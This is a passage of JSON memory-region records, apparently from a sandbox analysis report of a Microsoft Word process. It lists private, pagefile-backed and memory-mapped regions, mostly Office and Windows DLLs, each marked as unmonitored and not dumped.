"private_memory", "start_va": 60489728, "timestamp": "00:00:17.716", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 60555264, "type": "region", "version": 1 }, "end_va": 61603839, "entry_point": 0, "filename": null, "id": "region_213", "name": "private_0x00000000039c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 60555264, "timestamp": "00:00:17.716", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 61669376, "type": "region", "version": 1 }, "end_va": 61931519, "entry_point": 0, "filename": null, "id": "region_214", "name": "private_0x0000000003ad0000", "norm_filename": null, "region_type": "private_memory", "start_va": 61669376, "timestamp": "00:00:17.716", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 62062592, "type": "region", "version": 1 }, "end_va": 62128127, "entry_point": 0, "filename": null, "id": "region_215", "name": "private_0x0000000003b30000", "norm_filename": null, "region_type": "private_memory", "start_va": 62062592, "timestamp": "00:00:17.716", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 262144, "start_va": 62128128, "type": "region", "version": 1 }, "end_va": 62390271, "entry_point": 0, "filename": null, "id": "region_216", "name": "private_0x0000000003b40000", "norm_filename": null, "region_type": "private_memory", "start_va": 62128128, "timestamp": "00:00:17.716", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8388608, "start_va": 62390272, "type": "region", "version": 1 }, "end_va": 70778879, "entry_point": 0, "filename": null, "id": "region_217", "name": "pagefile_0x0000000003b80000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 62390272, "timestamp": "00:00:17.716", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 70778880, "type": "region", "version": 1 }, "end_va": 71827455, "entry_point": 0, "filename": null, "id": "region_218", "name": "private_0x0000000004380000", "norm_filename": null, "region_type": "private_memory", "start_va": 70778880, "timestamp": "00:00:17.716", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 2097152, "start_va": 71827456, "type": "region", "version": 1 }, "end_va": 73924607, "entry_point": 0, "filename": null, "id": "region_219", "name": "private_0x0000000004480000", "norm_filename": null, "region_type": "private_memory", "start_va": 71827456, "timestamp": "00:00:17.716", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 74317824, "type": "region", "version": 1 }, "end_va": 75366399, "entry_point": 0, "filename": null, "id": "region_220", "name": "private_0x00000000046e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 74317824, "timestamp": "00:00:17.716", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 409600, "start_va": 75366400, "type": "region", "version": 1 }, "end_va": 75775999, "entry_point": 75366400, "filename": "\\Windows\\Fonts\\seguisb.ttf", "id": "region_221", "name": "seguisb.ttf", "norm_filename": "c:\\windows\\fonts\\seguisb.ttf", "region_type": "memory_mapped_file", "start_va": 75366400, "timestamp": "00:00:17.716", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 76152832, "type": "region", "version": 1 }, "end_va": 77201407, "entry_point": 0, "filename": null, "id": "region_222", "name": "private_0x00000000048a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 76152832, "timestamp": "00:00:17.717", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 77725696, "type": "region", "version": 1 }, "end_va": 78774271, "entry_point": 0, "filename": null, "id": "region_223", "name": "private_0x0000000004a20000", "norm_filename": null, "region_type": "private_memory", "start_va": 77725696, "timestamp": "00:00:17.717", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4194304, "start_va": 78774272, "type": "region", "version": 1 }, "end_va": 82968575, "entry_point": 0, "filename": null, "id": "region_224", "name": "pagefile_0x0000000004b20000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 78774272, "timestamp": "00:00:17.717", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 83034112, "type": "region", "version": 1 }, "end_va": 84082687, "entry_point": 0, "filename": null, "id": "region_225", "name": "private_0x0000000004f30000", "norm_filename": null, "region_type": "private_memory", "start_va": 83034112, "timestamp": "00:00:17.717", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 84410368, "type": "region", "version": 1 }, "end_va": 84672511, "entry_point": 0, "filename": null, "id": "region_226", "name": "private_0x0000000005080000", "norm_filename": null, "region_type": "private_memory", "start_va": 84410368, "timestamp": "00:00:17.717", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4194304, "start_va": 84672512, "type": "region", "version": 1 }, "end_va": 88866815, "entry_point": 0, "filename": null, "id": "region_227", "name": "private_0x00000000050c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 84672512, "timestamp": "00:00:17.717", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4194304, "start_va": 88866816, "type": "region", "version": 1 }, "end_va": 93061119, "entry_point": 0, "filename": null, "id": "region_228", "name": "private_0x00000000054c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 88866816, "timestamp": "00:00:17.718", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8388608, "start_va": 93061120, "type": "region", "version": 1 }, "end_va": 101449727, "entry_point": 0, "filename": null, "id": "region_229", "name": "pagefile_0x00000000058c0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 93061120, "timestamp": "00:00:17.718", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4198400, "start_va": 101449728, "type": "region", "version": 1 }, "end_va": 105648127, "entry_point": 0, "filename": null, "id": "region_230", "name": "private_0x00000000060c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 101449728, "timestamp": "00:00:17.718", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4198400, "start_va": 105709568, "type": "region", "version": 1 }, "end_va": 109907967, "entry_point": 0, "filename": null, "id": "region_231", "name": "private_0x00000000064d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 105709568, "timestamp": "00:00:17.719", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4198400, "start_va": 109969408, "type": "region", "version": 1 }, "end_va": 114167807, "entry_point": 0, "filename": null, "id": "region_232", "name": "private_0x00000000068e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 109969408, "timestamp": "00:00:17.719", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 2097152, "start_va": 114229248, "type": "region", "version": 1 }, "end_va": 116326399, "entry_point": 0, "filename": null, "id": "region_233", "name": "private_0x0000000006cf0000", "norm_filename": null, "region_type": "private_memory", "start_va": 114229248, "timestamp": "00:00:17.719", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4980736, "start_va": 116326400, "type": "region", "version": 1 }, "end_va": 121307135, "entry_point": 0, "filename": null, "id": "region_234", "name": "private_0x0000000006ef0000", "norm_filename": null, "region_type": "private_memory", "start_va": 116326400, "timestamp": "00:00:17.719", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8388608, "start_va": 121307136, "type": "region", "version": 1 }, "end_va": 129695743, "entry_point": 0, "filename": null, "id": "region_235", "name": "private_0x00000000073b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 121307136, "timestamp": "00:00:17.720", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4194304, "start_va": 129695744, "type": "region", "version": 1 }, "end_va": 133890047, "entry_point": 0, "filename": null, "id": "region_236", "name": "private_0x0000000007bb0000", "norm_filename": null, "region_type": "private_memory", "start_va": 129695744, "timestamp": "00:00:17.720", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 133890048, "type": "region", "version": 1 }, "end_va": 134938623, "entry_point": 0, "filename": null, "id": "region_237", "name": "private_0x0000000007fb0000", "norm_filename": null, "region_type": "private_memory", "start_va": 133890048, "timestamp": "00:00:17.720", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 135331840, "type": "region", "version": 1 }, "end_va": 136380415, "entry_point": 0, "filename": null, "id": "region_238", "name": "private_0x0000000008110000", "norm_filename": null, "region_type": "private_memory", "start_va": 135331840, "timestamp": "00:00:17.720", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 136380416, "type": "region", "version": 1 }, "end_va": 137428991, "entry_point": 0, "filename": null, "id": "region_239", "name": "private_0x0000000008210000", "norm_filename": null, "region_type": "private_memory", "start_va": 136380416, "timestamp": "00:00:17.720", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 138215424, "type": "region", "version": 1 }, "end_va": 139263999, "entry_point": 0, "filename": null, "id": "region_240", "name": "private_0x00000000083d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 138215424, "timestamp": "00:00:17.720", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 139395072, "type": "region", "version": 1 }, "end_va": 140443647, "entry_point": 0, "filename": null, "id": "region_241", "name": "private_0x00000000084f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 139395072, "timestamp": "00:00:17.720", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 140574720, "type": "region", "version": 1 }, "end_va": 141623295, "entry_point": 0, "filename": null, "id": "region_242", "name": "private_0x0000000008610000", "norm_filename": null, "region_type": "private_memory", "start_va": 140574720, "timestamp": "00:00:17.720", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 142147584, "type": "region", "version": 1 }, "end_va": 143196159, "entry_point": 0, "filename": null, "id": "region_243", "name": "private_0x0000000008790000", "norm_filename": null, "region_type": "private_memory", "start_va": 142147584, "timestamp": "00:00:17.720", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 65536, "start_va": 901906432, "type": "region", "version": 1 }, "end_va": 901971967, "entry_point": 0, "filename": null, "id": "region_244", "name": "private_0x0000000035c20000", "norm_filename": null, "region_type": "private_memory", "start_va": 901906432, "timestamp": "00:00:17.720", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 94208, "start_va": 1604124672, "type": "region", "version": 1 }, "end_va": 1604218879, "entry_point": 1604124672, "filename": "\\Program Files\\Microsoft Office\\root\\Office16\\MSOHEV.DLL", "id": "region_245", "name": "msohev.dll", "norm_filename": "c:\\program files\\microsoft office\\root\\office16\\msohev.dll", "region_type": "memory_mapped_file", "start_va": 1604124672, "timestamp": "00:00:17.720", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 180224, "start_va": 1605238784, "type": "region", "version": 1 }, "end_va": 1605419007, "entry_point": 1605277161, "filename": "\\Program Files\\Microsoft Office\\root\\Office16\\ONBttnWD.dll", "id": "region_246", "name": "onbttnwd.dll", "norm_filename": "c:\\program files\\microsoft office\\root\\office16\\onbttnwd.dll", "region_type": "memory_mapped_file", "start_va": 1605238784, "timestamp": "00:00:17.745", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 8343552, "start_va": 1605435392, "type": "region", "version": 1 }, "end_va": 1613778943, "entry_point": 1605435392, "filename": "\\Program Files\\Microsoft Office\\root\\Office16\\CHART.DLL", "id": "region_247", "name": "chart.dll", "norm_filename": "c:\\program files\\microsoft office\\root\\office16\\chart.dll", "region_type": "memory_mapped_file", "start_va": 1605435392, "timestamp": "00:00:17.747", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1712128, "start_va": 1613824000, "type": "region", "version": 1 }, "end_va": 1615536127, "entry_point": 1613824000, "filename": "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\OFFICE16\\RICHED20.DLL", "id": "region_248", "name": "riched20.dll", "norm_filename": "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\office16\\riched20.dll", "region_type": "memory_mapped_file", "start_va": 1613824000, "timestamp": "00:00:17.786", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 491520, "start_va": 1616445440, "type": "region", "version": 1 }, "end_va": 1616936959, "entry_point": 1616445440, "filename": "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll", "id": "region_249", "name": "mscoreei.dll", "norm_filename": "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscoreei.dll", "region_type": "memory_mapped_file", "start_va": 1616445440, "timestamp": "00:00:17.829", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 303104, "start_va": 1616969728, "type": "region", "version": 1 }, "end_va": 1617272831, "entry_point": 1616969728, "filename": "\\Windows\\System32\\mscoree.dll", "id": "region_250", "name": "mscoree.dll", "norm_filename": "c:\\windows\\system32\\mscoree.dll", "region_type": "memory_mapped_file", "start_va": 1616969728, "timestamp": "00:00:17.869", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1089536, "start_va": 1617297408, "type": "region", "version": 1 }, "end_va": 1618386943, "entry_point": 1617297408, "filename": "\\Windows\\System32\\DWrite.dll", "id": "region_251", "name": "dwrite.dll", "norm_filename": "c:\\windows\\system32\\dwrite.dll", "region_type": "memory_mapped_file", "start_va": 1617297408, "timestamp": "00:00:17.905", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1228800, "start_va": 1618411520, "type": "region", "version": 1 }, "end_va": 1619640319, "entry_point": 1618411520, "filename": "\\Windows\\System32\\d3d10warp.dll", "id": "region_252", "name": "d3d10warp.dll", "norm_filename": "c:\\windows\\system32\\d3d10warp.dll", "region_type": "memory_mapped_file", "start_va": 1618411520, "timestamp": "00:00:17.923", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1146880, "start_va": 1619656704, "type": "region", "version": 1 }, "end_va": 1620803583, "entry_point": 1619656704, "filename": "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\OFFICE16\\MSPTLS.DLL", "id": "region_253", "name": "msptls.dll", "norm_filename": "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\office16\\msptls.dll", "region_type": "memory_mapped_file", "start_va": 1619656704, "timestamp": "00:00:17.939", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1527808, "start_va": 1620836352, "type": "region", "version": 1 }, "end_va": 1622364159, "entry_point": 1620836352, "filename": "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\OFFICE16\\1033\\MSOINTL.DLL", "id": "region_254", "name": "msointl.dll", "norm_filename": "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\office16\\1033\\msointl.dll", "region_type": "memory_mapped_file", "start_va": 1620836352, "timestamp": "00:00:17.986", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 692224, "start_va": 1622409216, "type": "region", "version": 1 }, "end_va": 1623101439, "entry_point": 1622409216, "filename": "\\Program Files\\Microsoft Office\\root\\Office16\\1033\\WWINTL.DLL", "id": "region_255", "name": "wwintl.dll", "norm_filename": "c:\\program files\\microsoft office\\root\\office16\\1033\\wwintl.dll", "region_type": "memory_mapped_file", "start_va": 1622409216, "timestamp": "00:00:18.002", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 82046976, "start_va": 1623130112, "type": "region", "version": 1 }, "end_va": 1705177087, "entry_point": 1623130112, "filename": "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\OFFICE16\\MSORES.DLL", "id": "region_256", "name": "msores.dll", "norm_filename": "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\office16\\msores.dll", "region_type": "memory_mapped_file", "start_va": 1623130112, "timestamp": "00:00:18.026", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 9572352, "start_va": 1705181184, "type": "region", "version": 1 }, "end_va": 1714753535, "entry_point": 1705181184, "filename": "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\OFFICE16\\MSO99LRES.DLL", "id": "region_257", "name": "mso99lres.dll", "norm_filename": "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\office16\\mso99lres.dll", "region_type": "memory_mapped_file", "start_va": 1705181184, "timestamp": "00:00:18.042", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 3178496, "start_va": 1714814976, "type": "region", "version": 1 }, "end_va": 1717993471, "entry_point": 1714814976, "filename": "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\OFFICE16\\MSO40UIRES.DLL", "id": "region_258", "name": "mso40uires.dll", "norm_filename": "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\office16\\mso40uires.dll", "region_type": "memory_mapped_file", "start_va": 1714814976, "timestamp": "00:00:18.064", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 14360576, "start_va": 1718026240, "type": "region", "version": 1 }, "end_va": 1732386815, "entry_point": 1718026240, "filename": "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\OFFICE16\\MSO.DLL", "id": "region_259", "name": "mso.dll", "norm_filename": "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\office16\\mso.dll", "region_type": "memory_mapped_file", "start_va": 1718026240, "timestamp": "00:00:18.078", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 5865472, "start_va": 1732444160, "type": "region", "version": 1 }, "end_va": 1738309631, "entry_point": 1732444160, "filename": "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\OFFICE16\\Mso99Lwin32client.dll", "id": "region_260", "name": "mso99lwin32client.dll", "norm_filename": "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\office16\\mso99lwin32client.dll", "region_type": "memory_mapped_file", "start_va": 1732444160, "timestamp": "00:00:18.153", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 7426048, "start_va": 1738342400, "type": "region", "version": 1 }, "end_va": 1745768447, "entry_point": 1738342400, "filename": "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\OFFICE16\\Mso40UIwin32client.dll", "id": "region_261", "name": "mso40uiwin32client.dll", "norm_filename": "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\office16\\mso40uiwin32client.dll", "region_type": "memory_mapped_file", "start_va": 1738342400, "timestamp": "00:00:18.158", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 3153920, "start_va": 1745813504, "type": "region", "version": 1 }, "end_va": 1748967423, "entry_point": 1745813504, "filename": "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\OFFICE16\\Mso30win32client.dll", "id": "region_262", "name": "mso30win32client.dll", "norm_filename": "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\office16\\mso30win32client.dll", "region_type": "memory_mapped_file", "start_va": 1745813504, "timestamp": "00:00:18.175", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1921024, "start_va": 1749024768, "type": "region", "version": 1 }, "end_va": 1750945791, "entry_point": 1749024768, "filename": "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\OFFICE16\\Mso20win32client.dll", "id": "region_263", "name": "mso20win32client.dll", "norm_filename": "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\office16\\mso20win32client.dll", "region_type": "memory_mapped_file", "start_va": 1749024768, "timestamp": "00:00:18.188", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 12525568, "start_va": 1750990848, "type": "region", "version": 1 }, "end_va": 1763516415, "entry_point": 1750990848, "filename": "\\Program Files\\Microsoft Office\\root\\Office16\\OART.DLL", "id": "region_264", "name": "oart.dll", "norm_filename": "c:\\program files\\microsoft office\\root\\office16\\oart.dll", "region_type": "memory_mapped_file", "start_va": 1750990848, "timestamp": "00:00:18.202", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 536576, "start_va": 1763573760, "type": "region", "version": 1 }, "end_va": 1764110335, "entry_point": 1763573760, "filename": "\\Windows\\System32\\d3d11.dll", "id": "region_265", "name": "d3d11.dll", "norm_filename": "c:\\windows\\system32\\d3d11.dll", "region_type": "memory_mapped_file", "start_va": 1763573760, "timestamp": "00:00:18.217", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 29761536, "start_va": 1764163584, "type": "region", "version": 1 }, "end_va": 1793925119, "entry_point": 1764163584, "filename": "\\Program Files\\Microsoft Office\\root\\Office16\\WWLIB.DLL", "id": "region_266", "name": "wwlib.dll", "norm_filename": "c:\\program files\\microsoft office\\root\\office16\\wwlib.dll", "region_type": "memory_mapped_file", "start_va": 1764163584, "timestamp": "00:00:18.232", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 901120, "start_va": 1793982464, "type": "region", "version": 1 }, "end_va": 1794883583, "entry_point": 1793982464, "filename": "\\Program Files\\Microsoft Office\\root\\Office16\\ucrtbase.dll", "id": "region_267", "name": "ucrtbase.dll", "norm_filename": "c:\\program files\\microsoft office\\root\\office16\\ucrtbase.dll", "region_type": "memory_mapped_file", "start_va": 1793982464, "timestamp": "00:00:18.298", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1789952, "start_va": 1794899968, "type": "region", "version": 1 }, "end_va": 1796689919, "entry_point": 1794899968, "filename": "\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems32.dll", "id": "region_268", "name": "appvisvsubsystems32.dll", "norm_filename": "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystems32.dll", "region_type": "memory_mapped_file", "start_va": 1794899968, "timestamp": "00:00:18.346", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 184320, "start_va": 1797783552, "type": "region", "version": 1 }, "end_va": 1797967871, "entry_point": 1797783552, "filename": "\\Program Files\\Common Files\\microsoft shared\\OfficeSoftwareProtectionPlatform\\OSPPC.DLL", "id": "region_269", "name": "osppc.dll", "norm_filename": "c:\\program files\\common files\\microsoft shared\\officesoftwareprotectionplatform\\osppc.dll", "region_type": "memory_mapped_file", "start_va": 1797783552, "timestamp": "00:00:18.366", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 135168, "start_va": 1797980160, "type": "region", "version": 1 }, "end_va": 1798115327, "entry_point": 1797980160, "filename": "\\Windows\\System32\\sppc.dll", "id": "region_270", "name": "sppc.dll", "norm_filename": "c:\\windows\\system32\\sppc.dll", "region_type": "memory_mapped_file", "start_va": 1797980160, "timestamp": "00:00:18.402", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 188416, "start_va": 1802043392, "type": "region", "version": 1 }, "end_va": 